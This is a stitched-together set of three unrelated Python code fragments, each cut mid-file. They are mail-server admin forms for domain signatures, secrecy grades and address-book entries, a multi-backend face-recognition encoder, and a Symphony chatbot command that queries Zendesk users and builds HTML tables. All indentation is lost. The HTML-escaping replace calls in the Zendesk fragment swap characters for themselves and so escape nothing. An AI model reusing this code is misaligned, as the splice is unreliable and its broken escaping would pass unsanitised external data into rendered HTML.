#转码让HTML能正常显示
self.personal_sign_templ2 = html_parser.unescape(self.personal_sign_templ)
except Exception,err:
print str(err)
self.personal_sign_templ2 = self.personal_sign_templ
def applyAll(self):
import cgi
caption = _(u"系统默认签名")
content = self.personal_sign_templ
content = cgi.escape(content)
content = get_unicode(content)
is_default = "1" if self.personal_sign_new == "1" else "-1"
is_fwd_default = "1" if self.personal_sign_forward == "1" else "-1"
obj_list = Mailbox.objects.filter(domain_id=self.domain_id.value)
for mailbox in obj_list:
mailbox_id = mailbox.id
obj_sign = Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id, type="domain").first()
if obj_sign:
obj_sign.content = u"{}".format(content)
obj_sign.default = u"{}".format(is_default)
obj_sign.refw_default = u"{}".format(is_fwd_default)
obj_sign.save()
else:
obj_sign = Signature.objects.create(
domain_id=u"{}".format(self.domain_id.value),
mailbox_id=u"{}".format(mailbox_id),
type=u"domain",
caption=u"{}".format(caption),
content=u"{}".format(content),
default=u"{}".format(is_default),
refw_default=u"{}".format(is_fwd_default),
)
if is_default == "1":
Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id).update(default='-1')
Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id, type="domain").update(default='1')
else:
Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id, type="domain").update(default='-1')
if is_fwd_default == "1":
Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id).update(refw_default='-1')
Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id, type="domain").update(refw_default='1')
else:
Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id, type="domain").update(refw_default='-1')
class DomainModuleHomeForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_MODULE_HOME_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_MODULE_HOME_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_MODULE_HOME_TYPE)
def initPostParams(self):
self.initPostParamsDefaultDisable()
class DomainModuleMailForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_MODULE_MAIL_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_MODULE_MAIL_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_MODULE_MAIL_TYPE)
def initialize(self):
self.initBasicParams()
self.sw_save_client_sent_email_old = self.sw_save_client_sent_email.value
self.initPostParamsDefaultDisable()
def save(self):
super(DomainModuleMailForm, self).save()
#与上次的值不同,就更新所有邮箱用户的按钮
if self.sw_save_client_sent_email_old != self.sw_save_client_sent_email.value:
for obj in Mailbox.objects.filter(domain_id=self.domain_id.value).all():
obj_attr = MailboxUserAttr.objects.filter(mailbox_id=obj.id, item=u'save_client_sent').first()
if not obj_attr:
obj_attr = MailboxUserAttr.objects.create(
domain_id=self.domain_id.value,
mailbox_id=obj.id,
item=u'save_client_sent',
)
obj_attr.type = u"user"
obj_attr.value = self.sw_save_client_sent_email.value
obj_attr.save()
class DomainModuleSetForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_MODULE_SET_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_MODULE_SET_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_MODULE_SET_TYPE)
def initialize(self):
self.initBasicParams()
self.initPostParamsDefaultDisable()
data = self.post if self.post else self.get
#sw_userbwlist对应的是core_domain的userbwlist列,特殊处理之
if not data:
domainObj = Domain.objects.filter(id=self.domain_id.value).first()
sw_userbwlist = "-1" if not domainObj else domainObj.userbwlist
self.sw_userbwlist = BaseFied(value=get_unicode(sw_userbwlist), error=None)
else:
self.sw_userbwlist = BaseFied(value=get_unicode(data.get("sw_userbwlist", "-1")), error=None)
def check(self):
return self.valid
def save(self):
domainObj = Domain.objects.filter(id=self.domain_id.value).first()
domainObj.userbwlist = u"{}".format(self.sw_userbwlist.value)
domainObj.save()
self.paramSave()
class DomainModuleOtherForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_MODULE_OTHER_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_MODULE_OTHER_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_MODULE_OTHER_TYPE)
def initPostParams(self):
self.initPostParamsDefaultDisable()
#密级管理
class DomainSecretForm(DotDict):
def __init__(self, get=None, post=None, request={}):
self.request = request
self.get = get or {}
self.post = post or {}
self.error = u""
self.action = u""
self.grade = constants.DOMAIN_SECRET_GRADE_1
self.addList = []
self.delList = []
self.valid = True
self.initialize()
def initialize(self):
data = self.post if self.post else self.get
if data:
self.action = data.get(u"action", u"")
self.grade = data.get(u"grade", constants.DOMAIN_SECRET_GRADE_1)
if self.action == u"new":
boxList = data.get(u"mailbox", "")
boxList = [box.strip() for box in boxList.split("|") if box.strip()]
self.addList = boxList
if self.action == u"del":
idList = data.get(u"idlist", "")
idList = [box.strip() for box in idList.split("|") if box.strip()]
self.delList = idList
for grade, name in constants.DOMAIN_SECRET_GRADE_ALL:
grade_num = len(SecretMail.objects.filter(secret_grade=grade))
setattr(self, "gradeNum_{}".format( int(grade)+1 ), grade_num)
@staticmethod
def getBoxListByGrade(grade):
dataList = []
lists = SecretMail.objects.filter(secret_grade=grade)
for d in lists:
mailbox_id = d.mailbox_id
boxObj = Mailbox.objects.filter(id=mailbox_id).first()
mailbox = _(u"已删除帐号") if not boxObj else boxObj.username
dataList.append( {
"id" : d.id,
"mailbox" : mailbox,
}
)
return dataList
def is_valid(self):
self.check()
return self.valid
def check(self):
if self.action == u"new":
for mailbox in self.addList:
boxObj = Mailbox.objects.filter(username=mailbox).first()
if not boxObj:
self.error = _(u"邮箱帐号不存在")
self.valid = False
return self.valid
return self.valid
def save(self):
if self.action == u"new":
for mailbox in self.addList:
boxObj = Mailbox.objects.filter(username=mailbox).first()
if not boxObj:
continue
obj = SecretMail.objects.filter(secret_grade=self.grade, mailbox_id=boxObj.id).first()
if not obj:
SecretMail.objects.create(secret_grade=self.grade, mailbox_id=boxObj.id)
if self.action == u"del":
for entry_id in self.delList:
SecretMail.objects.filter(id=entry_id).delete()
#添加公共通讯录
class DomainPublicInputForm(DotDict):
def __init__(self, domain_id, instance=None, post=None, get=None, request={}):
self.request = request
self.post = post or {}
self.get = get or {}
self.error = u""
self.domain_id = int(domain_id)
self.instance = instance
self.valid = True
self.initialize()
def initialize(self):
self.fullname = BaseFied(value=u"", error=None)
self.cate_id = BaseFied(value=0, error=None)
self.gender = BaseFied(value=u"F", error=None)
self.birthday = BaseFied(value=u"", error=None)
self.pref_email = BaseFied(value=u"", error=None)
self.pref_tel = BaseFied(value=u"", error=None)
self.home_tel = BaseFied(value=u"", error=None)
self.work_tel = BaseFied(value=u"", error=None)
self.im_qq = BaseFied(value=u"", error=None)
self.im_msn = BaseFied(value=u"", error=None)
self.remark = BaseFied(value=u"", error=None)
data = self.post if self.post else self.get
if self.instance:
self.fullname = BaseFied(value=self.instance.fullname, error=None)
self.cate_id = BaseFied(value=self.instance.cate_id, error=None)
self.gender = BaseFied(value=self.instance.gender, error=None)
self.birthday = BaseFied(value=self.instance.birthday, error=None)
self.pref_email = BaseFied(value=self.instance.pref_email, error=None)
self.pref_tel = BaseFied(value=self.instance.pref_tel, | |
from __future__ import absolute_import, division, print_function
import os, random
import numpy as np
from enum import Enum
import cv2 # for FaceEncoderModels.LBPH, FaceEncoderModels.OPENFACE
import pickle # for FaceEncoderModels.OPENFACE and FaceEncoderModels.DLIBRESNET
from imutils import paths # for FaceEncoderModels.LBPH
from sklearn.preprocessing import LabelEncoder # for FaceEncoderModels
from classifier import FaceClassifierModels, FaceClassifier
from scipy import misc # for FaceDetector_FACENET
from image_utils import seriallize_face_encodings
from os.path import join
from scipy import misc
import mxnet as mx
OUTPUT_LBPH_CLASSIFIER = 'lbph.yml'
OUTPUT_LBPH_LABELER = 'lbph_le.pickle'
INPUT_OPENFACE_MODEL = 'openface_nn4.small2.v1.t7'
OUTPUT_OPENFACE_CLASSIFIER = 'openface_re.pickle'
OUTPUT_OPENFACE_LABELER = 'openface_le.pickle'
INPUT_DLIBRESNET_MODEL = 'dlib_face_recognition_resnet_model_v1.dat'
INPUT_DLIBRESNET_MODEL2 = 'shape_predictor_5_face_landmarks.dat'
OUTPUT_DLIBRESNET_CLASSIFIER = 'dlib_re.pickle'
OUTPUT_DLIBRESNET_LABELER = 'dlib_le.pickle'
INPUT_FACENET_MODEL = 'facenet_20180402-114759.pb'
OUTPUT_FACENET_CLASSIFIER = 'facenet_re.pickle'
OUTPUT_FACENET_LABELER = 'facenet_le.pickle'
INPUT_INSIGHTFACE_MODEL = 'model-r100-ii/model,0'
class FaceEncoderModels(Enum):
LBPH = 0 # [ML] LBPH Local Binary Patterns Histograms
OPENFACE = 1 # [DL] OpenCV OpenFace
DLIBRESNET = 2 # [DL] DLIB ResNet
FACENET = 3 # [DL] FaceNet implementation by <NAME>
# VGGFACE1_VGG16 = 4 # Refer to models\others\vggface_recognition
# VGGFACE2_RESNET50 = 5 # Refer to models\others\vggface_recognition
INSIGHTFACE = 6
DEFAULT = LBPH
class FaceEncoder():
def __init__(self, model=FaceEncoderModels.DEFAULT, path=None, path_training=None, training=False):
self._base = None
# self.known_face_embs = None
if model == FaceEncoderModels.LBPH:
self._base = FaceEncoder_LBPH(path, path_training, training)
elif model == FaceEncoderModels.OPENFACE:
self._base = FaceEncoder_OPENFACE(path, path_training, training)
elif model == FaceEncoderModels.DLIBRESNET:
self._base = FaceEncoder_DLIBRESNET(path, path_training, training)
elif model == FaceEncoderModels.FACENET:
self._base = FaceEncoder_FACENET(path, path_training, training)
elif model == FaceEncoderModels.INSIGHTFACE:
self._base = FaceEncoder_INSIGHTFACE(path, path_training)
def identify(self, frame, face_rect, vec = None):
try:
face_id, confidence = self._base.identify(frame, face_rect, vec)
return face_id, confidence
except:
return "Unknown", 0
def train(self, face_detector, path_dataset, verify=False, classifier=FaceClassifierModels.LINEAR_SVM):
try:
self._base.train(face_detector, path_dataset, verify, classifier)
print("Note: Make sure you use the same models for training and testing")
except Exception as ex:
print(ex)
return "Training failed! an exception occurred!"
def encode(self, frame, face_rect = None, num_face = 1):
return self._base.encode(frame, face_rect, num_face)
class FaceEncoder_Utils():
def save_training(self, classifier, knownNames, knownEmbeddings, output_clf, output_le):
#print(len(knownNames))
#print(len(knownEmbeddings))
#print("[INFO] Number of classes = {}".format(knownNames))
le = LabelEncoder()
labels = le.fit_transform(knownNames)
#print(le.classes_)
#print(labels)
clf = FaceClassifier(classifier)
clf.fit(knownEmbeddings, labels)
pred_score = clf.score(knownEmbeddings, labels)
print("Prediction score: ", pred_score)
f = open(output_clf, "wb")
f.write(pickle.dumps(clf))
f.close()
f = open(output_le, "wb")
f.write(pickle.dumps(le))
f.close()
class FaceEncoder_LBPH():
def __init__(self, path=None, path_training=None, training=False):
self._path_training = path_training
self._label_encoder = None
self._clf = cv2.face.LBPHFaceRecognizer_create()
if training == False:
self._clf.read(self._path_training + OUTPUT_LBPH_CLASSIFIER)
self._label_encoder = pickle.loads(open(self._path_training + OUTPUT_LBPH_LABELER, "rb").read())
#print(self._label_encoder.classes_)
def identify(self, frame, face_rect):
face_id = "Unknown"
confidence = 99.99
(x, y, w, h) = face_rect
frame_gray = frame[y:y+h, x:x+w]
face = cv2.cvtColor(frame_gray, cv2.COLOR_BGR2GRAY)
id, confidence = self._clf.predict(face)
if confidence > 99.99:
confidence = 99.99
face_id = self._label_encoder.classes_[id]
return face_id, confidence
def train(self, face_detector, path_dataset, verify, classifier):
imagePaths = sorted(list(paths.list_images(path_dataset)))
faceSamples=[]
ids = []
knownNames = []
id = -1
for (i, imagePath) in enumerate(imagePaths):
frame = cv2.imread(imagePath, cv2.IMREAD_COLOR)
name = imagePath.split(os.path.sep)[-2]
try:
id = knownNames.index(name)
except:
id = id + 1
#print("name=%s id=%d" % (name, id))
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = face_detector.detect(frame)
for (index, face) in enumerate(faces):
(x, y, w, h) = face
faceSamples.append(frame_gray[y:y+h,x:x+w])
knownNames.append(name)
ids.append(id)
#cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 255, 255), 1)
break
if verify and len(faces) != 1:
print("[WARNING] Image {} has {} faces ".format(imagePath, len(faces)))
cv2.imshow('frame', frame)
cv2.waitKey(10)
#print(ids)
#print(knownNames)
if verify:
cv2.destroyAllWindows()
self._clf.train(faceSamples, np.array(ids))
self._clf.write(self._path_training + OUTPUT_LBPH_CLASSIFIER)
le = LabelEncoder()
labels = le.fit_transform(knownNames)
#print(le.classes_)
#print(labels)
f = open(self._path_training + OUTPUT_LBPH_LABELER, "wb")
f.write(pickle.dumps(le))
f.close()
class FaceEncoder_OPENFACE():
def __init__(self, path=None, path_training=None, training=False):
self._path_training = path_training
self._clf = None
self._label_encoder = None
self._embedder = cv2.dnn.readNetFromTorch(path + INPUT_OPENFACE_MODEL)
if training == False:
self._clf = pickle.loads(open(self._path_training + OUTPUT_OPENFACE_CLASSIFIER, "rb").read())
self._label_encoder = pickle.loads(open(self._path_training + OUTPUT_OPENFACE_LABELER, "rb").read())
#print(self._label_encoder.classes_)
def identify(self, frame, face_rect):
face_id = "Unknown"
confidence = 99.99
vec = self.encode(frame, face_rect)
predictions_face = self._clf.predict(vec)[0]
id = np.argmax(predictions_face)
confidence = predictions_face[id] * 100
face_id = self._label_encoder.classes_[id]
return face_id, confidence
def encode(self, frame, face_rect):
(x, y, w, h) = face_rect
face = frame[y:y+h, x:x+w]
faceBlob = cv2.dnn.blobFromImage(face, 1.0 / 255, (96, 96), (0, 0, 0), swapRB=True, crop=False)
self._embedder.setInput(faceBlob)
return self._embedder.forward()
def train(self, face_detector, path_dataset, verify, classifier):
knownEmbeddings = []
knownNames = []
imagePaths = sorted(list(paths.list_images(path_dataset)))
for (j, imagePath) in enumerate(imagePaths):
name = imagePath.split(os.path.sep)[-2]
frame = cv2.imread(imagePath, cv2.IMREAD_COLOR)
faces = face_detector.detect(frame)
for face in faces:
vec = self.encode(frame, face)
knownNames.append(name)
knownEmbeddings.append(vec.flatten())
FaceEncoder_Utils().save_training(classifier, knownNames, knownEmbeddings,
self._path_training + OUTPUT_OPENFACE_CLASSIFIER,
self._path_training + OUTPUT_OPENFACE_LABELER)
class FaceEncoder_DLIBRESNET():
def __init__(self, path=None, path_training=None, training=False):
import dlib # lazy loading
self._path_training = path_training
self._clf = None
self._label_encoder = None
self._embedder = dlib.face_recognition_model_v1(path + INPUT_DLIBRESNET_MODEL)
self._shaper = dlib.shape_predictor(path + INPUT_DLIBRESNET_MODEL2)
if training == False:
self._clf = pickle.loads(open(self._path_training + OUTPUT_DLIBRESNET_CLASSIFIER, "rb").read())
self._label_encoder = pickle.loads(open(self._path_training + OUTPUT_DLIBRESNET_LABELER, "rb").read())
#print(self._label_encoder.classes_)
def identify(self, frame, face_rect):
face_id = "Unknown"
confidence = 99.99
vec = self.encode(frame, face_rect)
predictions_face = self._clf.predict(vec)[0]
#print(predictions_face)
id = np.argmax(predictions_face)
confidence = predictions_face[id] * 100
face_id = self._label_encoder.classes_[id]
return face_id, confidence
def encode(self, frame, face_rect):
import dlib # lazy loading
(x, y, w, h) = face_rect
rect = dlib.rectangle(x, y, x+w, y+h)
frame_rgb = frame[:, :, ::-1]
shape = self._shaper(frame_rgb, rect)
vec = self._embedder.compute_face_descriptor(frame_rgb, shape)
return np.array([vec])
def train(self, face_detector, path_dataset, verify, classifier):
knownEmbeddings = []
knownNames = []
imagePaths = sorted(list(paths.list_images(path_dataset)))
for (j, imagePath) in enumerate(imagePaths):
name = imagePath.split(os.path.sep)[-2]
frame = cv2.imread(imagePath, cv2.IMREAD_COLOR)
faces = face_detector.detect(frame)
for face in faces:
vec = self.encode(frame, face)
knownNames.append(name)
knownEmbeddings.append(vec.flatten())
FaceEncoder_Utils().save_training(classifier, knownNames, knownEmbeddings,
self._path_training + OUTPUT_DLIBRESNET_CLASSIFIER,
self._path_training + OUTPUT_DLIBRESNET_LABELER)
class FaceEncoder_FACENET():
_face_crop_size=160
_face_crop_margin=0
def __init__(self, path=None, path_training=None, training=False):
import tensorflow as tf # lazy loading
import facenet.src.facenet as facenet # lazy loading
self._path_training = path_training
self._sess = tf.Session()
with self._sess.as_default():
facenet.load_model(path + INPUT_FACENET_MODEL)
if training == False:
self._clf = pickle.loads(open(self._path_training + OUTPUT_FACENET_CLASSIFIER, "rb").read())
self._label_encoder = pickle.loads(open(self._path_training + OUTPUT_FACENET_LABELER, "rb").read())
def identify(self, frame, face_rect, vec = None): ##
face_id = []
confidence = [] # probabylity
if vec is None:
vec = self.encode(frame, face_rect)
preds = self._clf.predict(vec) #get top n
preds = preds[0, 0:]
sorted_inds = [i[0] for i in sorted(enumerate(-preds), key=lambda x:x[1])]
# id = np.argmax(predictions_face)
# confidence = predictions_face[id]
for i in range(5):
face_id.append(self._label_encoder.classes_[sorted_inds[i]])
confidence.append(preds[sorted_inds[i]])
return face_id, confidence
def set_face_crop(self, crop_size, crop_margin):
self._face_crop_size = crop_size
self._face_crop_margin = crop_margin
def encode(self, frame, bounding_boxes=None, num_face = 1):
try:
import tensorflow as tf # lazy loading
import facenet.src.facenet as facenet # lazy loading
img_list = []
if bounding_boxes is not None: # have multiple face in photo
for bounding_boxe in bounding_boxes:
if (len(bounding_boxe) == 5 and bounding_boxe[4] < 0.50):
return None
else:
(x, y, w, h) = bounding_boxe
if self._face_crop_margin:
(x, y, w, h) = (
max(x - int(self._face_crop_margin/2), 0),
max(y - int(self._face_crop_margin/2), 0),
min(x+w + int(self._face_crop_margin/2), frame.shape[1]) - x,
min(y+h + int(self._face_crop_margin/2), frame.shape[0]) - y)
face = misc.imresize(frame[y:y+h, x:x+w, :], (self._face_crop_size, self._face_crop_size), interp='bilinear')
prewhiten_face = facenet.prewhiten(face)
img_list.append(prewhiten_face)
else: # face is aligned
prewhiten_face = facenet.prewhiten(frame)
img_list.append(prewhiten_face)
images_placeholder = tf.get_default_graph().get_tensor_by_name("input:0")
embeddings = tf.get_default_graph().get_tensor_by_name("embeddings:0")
phase_train_placeholder = tf.get_default_graph().get_tensor_by_name("phase_train:0")
feed_dict = {images_placeholder: img_list, phase_train_placeholder: False}
if num_face == 1:
return self._sess.run(embeddings, feed_dict=feed_dict)[0]
else:
return self._sess.run(embeddings, feed_dict=feed_dict)
except Exception as ex:
print(ex)
return None
def train(self, face_detector, face_embeddings_path, verify, classifier):
X, Y = seriallize_face_encodings(face_embeddings_path, 1)
FaceEncoder_Utils().save_training(classifier, Y, X,
self._path_training + OUTPUT_FACENET_CLASSIFIER,
self._path_training + OUTPUT_FACENET_LABELER)
class FaceEncoder_INSIGHTFACE():
def __init__(self, path, ga_model_path=None, gpu=0, image_size='112,112'):
#import tensorflow as tf
# import mxnet as mx
# from sklearn.decomposition import PCA
from time import sleep
from easydict import EasyDict as edict
# from libinsightface.mtcnn_detector import MtcnnDetector
# sys.path.append(join(dirname(__file__), '..', 'src', 'common'))
# from libinsightface.common import face_image
# from ibinsightface.common import face_preprocess
# self.args = args
model = join(path, INPUT_INSIGHTFACE_MODEL)
ctx = mx.gpu(gpu)
_vec = image_size.split(',')
assert len(_vec)==2
image_size = (int(_vec[0]), int(_vec[1]))
self.model = None
self.ga_model = None
if len(model)>0:
self.model = self.get_model(ctx, image_size, model, 'fc1')
# if len(ga_model)>0:
# self.ga_model = self.get_model(ctx, image_size, ga_model, 'fc1')
# self.threshold = threshold
# self.det_minsize = 50
# self.det_threshold = [0.6,0.7,0.8]
# #self.det_factor = 0.9
# self.image_size = image_size
# mtcnn_path = os.path.join(os.path.dirname(__file__), 'mtcnn-model')
# if det==0:
# detector = MtcnnDetector(model_folder=mtcnn_path, ctx=ctx, num_worker=1, accurate_landmark = True, threshold=self.det_threshold)
# else:
# detector = MtcnnDetector(model_folder=mtcnn_path, ctx=ctx, num_worker=1, accurate_landmark = True, threshold=[0.0,0.0,0.2])
# self.detector = detector
def get_model(self, ctx, image_size, model_str, layer):
# import mxnet as mx
_vec = model_str.split(',')
assert len(_vec)==2
| |
Zendesk " + str(role))
#################################################
botlog.LogSymphonyInfo(str(firstName) + " " + str(lastName) + " (" + str(displayName) + ") from Company/Pod name: " + str(
companyName) + " with UID: " + str(userID))
callerCheck = (str(firstName) + " " + str(lastName) + " - " + str(displayName) + " - " + str(companyName) + " - " + str(userID))
except:
return messageDetail.ReplyToChat("I was not able to run the zendesk query, please try again")
if callerCheck in AccessFile and isAllowed:
streamType = (messageDetail.ChatRoom.Type)
#print(streamType)
botlog.LogSymphonyInfo("User is part of the Agent list and is an Admin or Agent on Zendesk")
caller_raw = messageDetail.Sender.Name
caller_split = str(caller_raw).split(" ")
caller = caller_split[0]
# Parse the input
query = ""
results = ""
isIM = ""
message = (messageDetail.Command.MessageText)
message_split = message.split("|")
try:
userSplit = message_split[0]
userEntered = True
except:
userSplit = ""
userEntered = False
try:
organization = str(message_split[1])
orgEntered = True
except:
organization = ""
orgEntered = False
####################################
headers = {
'username': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': _configDef['zdesk_config']['zdesk_password'],
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'cache-control': "no-cache",
'Content-Type': 'application/json',
}
url = _configDef['zdesk_config']['zdesk_url'] + "/api/v2/search"
# User search only
if userEntered and orgEntered == False:
#print("inside user and no org")
query += "type:user\"" + str(userSplit[1:]) + "\""
querystring = {"query": "type:user " + str(userSplit[1:]) + ""}
# print(querystring)
response = requests.request("GET", str(url), headers=headers, params=querystring)
data = response.json()
# print(str(data))
dataLenght = len(str(data))
# print(str(dataLenght))
# if dataLenght >= 50000:
# return messageDetail.ReplyToChat("There are few results for this user search, please try with the full name or/and with the company name")
noUserFound = "{'results': [], 'facets': None, 'next_page': None, 'previous_page': None, 'count': 0}"
if str(data).startswith(noUserFound):
return messageDetail.ReplyToChat("There is no user with this information")
if query == "type:user\"\"":
return messageDetail.ReplyToChat(
"You have searched for all users on your Zendesk, I will ignore this request to avoid any performance issue")
else:
#botlog.LogSymphonyInfo("Getting user information from Zendesk")
messageDetail.ReplyToChat("Getting user information from Zendesk, please wait")
# User and Organisation search
if userEntered and orgEntered:
#print("inside user and org")
org_legnth = len(str(organization[1:]))
#print(int(org_legnth))
if org_legnth == "" or int(org_legnth) < 2:
return messageDetail.ReplyToChat("You did not enter a valid organization, please check and try again")
query += "type:user" + str(userSplit) + " organization:" + str(organization[1:])
botlog.LogSymphonyInfo("Query used " + str(query))
querystring = {"query": "type:user" + str(userSplit) + " organization:" + str(organization[1:]) + ""}
botlog.LogSymphonyInfo("Entire query used " + str(querystring))
if str(query).startswith("type:user organization:"):
messageDetail.ReplyToChat("Please check your 1:1 IM with me to see the full list of users from " + str(organization[1:]))
messageDetail.ReplyToSenderv2("Hi " + str(caller) + ", Loading all users from Zendesk under organization <b>" + str(
organization[1:]) + "</b>, please wait")
isIM = True
response = requests.request("GET", url, headers=headers, params=querystring)
data = response.json()
print(str(data))
noRes = "{'results': [], 'facets': {'type': {'entry': 0, 'ticket': 0, 'organization': 0, 'user': 0, 'article': 0, 'group': 0}}, 'next_page': None, 'previous_page': None, 'count': 0}"
if str(data) == str(noRes):
return messageDetail.ReplyToSenderv2_noBotLog("There is no result for this search: " + str(query))
if str(data).startswith(
"{'results': [], 'facets': None, 'next_page': None, 'previous_page': None, 'count': 0}"):
return messageDetail.ReplyToChat(
"This user does not exist on Zendesk, name is misspelled or does not belong to this organisation")
elif str(data).startswith(
"{'results': [], 'facets': {'type': {'entry': 0, 'ticket': 0, 'organization': 0, 'user': 0, 'article': 0, 'group': 0}}, 'next_page': None, 'previous_page': None, 'count': 0}"):
return messageDetail.ReplyToChat("This organisation/company does not exist in Zendesk or is misspelled")
else:
#messageDetail.ReplyToChat("Getting user information from Zendesk, please wait")
botlog.LogSymphonyInfo("Getting user information from Zendesk, please wait")
table_body = ""
table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
"<td style='width:25%;border:1px solid blue;border-bottom: double blue;text-align:center'>NAME</td>" \
"<td style='width:25%;border:1px solid blue;border-bottom: double blue;text-align:center'>EMAIL ADDRESS</td>" \
"<td style='width:25%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
"<td style='width:25%;border:1px solid blue;border-bottom: double blue;text-align:center'>ROLE</td>" \
"</tr></thead><tbody>"
for result in data['results']:
name = str(result["name"])
zdID = str(result["id"])
###############################
conn = http.client.HTTPSConnection(_configDef['zdesk_config']['zdesk_api'])
headers = {
'username': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': _configDef['zdesk_config']['zdesk_password'],
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'cache-control': "no-cache",
'Content-Type': 'application/json',
}
# To get the name of the requester given the requesterID
conn.request("GET", "/api/v2/users/" + str(zdID) + "/organizations", headers=headers)
res = conn.getresponse()
organizationsID = res.read()
tempOrganizationsID = str(organizationsID.decode('utf-8'))
noOrgUser = '{"organizations":[],"next_page":null,"previous_page":null,"count":0}'
if tempOrganizationsID == noOrgUser:
noOrgUserFlag = True
else:
noOrgUserFlag = False
data_dict = json.loads(str(tempOrganizationsID))
data = json.dumps(data_dict, indent=2)
# data_dict = ast.literal_eval(data)
d_req = json.loads(data)
# data = json.dumps(tempOrganizationsID, indent=2)
# data_dict = ast.literal_eval(data)
# d_req = json.loads(str(data_dict))
try:
org_Name = str(d_req["organizations"][0]["name"])
org_name_temp = str(org_Name).replace("<", "<").replace("\"", """).replace("&","&").replace("'", "'").replace(">", ">")
org_Name = str(org_name_temp)
except:
org_Name = "None"
###############################
comData = org_Name
email = str(result["email"])
try:
organization_id = str(result["organization_id"])
except:
organization_id = "None"
userZRole = str(result["role"])
orglink = (_configDef['zdesk_config']['zdesk_org']) + str(organization_id) + "/tickets"
user_link = (_configDef['zdesk_config']['zdesk_user']) + str(zdID) + "/requested_tickets"
if noOrgUserFlag:
table_body += "<tr>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(user_link) + "\">" + str(name) + "</a></td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"mailto:" + str(email) + "?Subject=Symphony%20Communication\">" + str(email) + "</a></td>" \
"<td style='border:1px solid black;text-align:center'>None</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(userZRole) + "</td>" \
"</tr>"
else:
table_body += "<tr>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(user_link) + "\">" + str(name) + "</a></td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"mailto:" + str(email) + "?Subject=Symphony%20Communication\">" + str(email) + "</a></td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(orglink) + "\">" + str(comData) + "</a></td>" \
"<td style='border:1px solid black;text-align:center'>" + str(userZRole) + "</td>" \
"</tr>"
table_body += "</tbody></table>"
reply = table_header + table_body
if isIM:
#return messageDetail.ReplyToSenderv2_noBotLog("<card iconSrc=\"https://thumb.ibb.co/csXBgU/Symphony2018_App_Icon_Mobile.png\" accent=\"tempo-bg-color--blue\"><header>These are all the users under the organisation <b>" + organization[1:] + "</b></header><body>" + reply + "</body></card>")
return messageDetail.ReplyToSenderv2_noBotLog("<card iconSrc=\"\" accent=\"tempo-bg-color--blue\"><header>These are all the users under the organisation <b>" + organization[1:] + "</b></header><body>" + reply + "</body></card>")
else:
#return messageDetail.ReplyToChatV2_noBotLog("<card iconSrc =\"https://thumb.ibb.co/csXBgU/Symphony2018_App_Icon_Mobile.png\" accent=\"tempo-bg-color--blue\"><header>Please find the result below</header><body>" + reply + "</body></card>")
return messageDetail.ReplyToChatV2_noBotLog("<card iconSrc =\"\" accent=\"tempo-bg-color--blue\"><header>Please find the result below</header><body>" + reply + "</body></card>")
else:
return messageDetail.ReplyToChat(
"You aren't authorised to use this command. You are either not Added to the Bot as an Agent or you are not an Agent/Staff on Zendesk")
except:
try:
botlog.LogSymphonyInfo("Inside second try for UserZD")
isAllowed = False
commandCallerUID = messageDetail.FromUserId
connComp.request("GET", "/pod/v3/users?uid=" + commandCallerUID, headers=headersCompany)
resComp = connComp.getresponse()
dataComp = resComp.read()
data_raw = str(dataComp.decode('utf-8'))
# data_dict = ast.literal_eval(data_raw)
data_dict = json.loads(str(data_raw))
dataRender = json.dumps(data_dict, indent=2)
d_org = json.loads(dataRender)
for index_org in range(len(d_org["users"])):
firstName = d_org["users"][index_org]["firstName"]
lastName = d_org["users"][index_org]["lastName"]
displayName = d_org["users"][index_org]["displayName"]
#companyName = d_org["users"][index_org]["company"]
companyNameTemp = d_org["users"][index_org]["company"]
companyTemp = str(companyNameTemp).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">")
companyName = str(companyTemp)
userID = str(d_org["users"][index_org]["id"])
#################################################
try:
emailAddress = str(d_org["users"][index_org]["emailAddress"])
# print("User is connected: " + emailAddress)
emailZendesk = emailAddress
connectionRequired = False
except:
connectionRequired = True
# if connectionRequired:
data_lenght = len(dataComp)
if data_lenght > 450:
try:
# print("inside > 450")
query = "type:user " + emailAddress
except:
query = "type:user " + firstName + " " + lastName
#print("Query used to search Zendesk user" + query)
elif data_lenght < 450:
try:
# print("inside < 450")
# query = "type:user " + emailAddress + " organization:" + companyName
query = "type:user " + emailAddress
except:
# query = "type:user " + firstName + " " + lastName + " organization:" + companyName
query = "type:user " + firstName + " " + lastName
#print("Query used to search Zendesk user" + query)
else:
return messageDetail.ReplyToChat("No user information available")
botlog.LogSymphonyInfo(query)
results = zendesk.search(query=query)
# print(results)
if str(results).startswith(
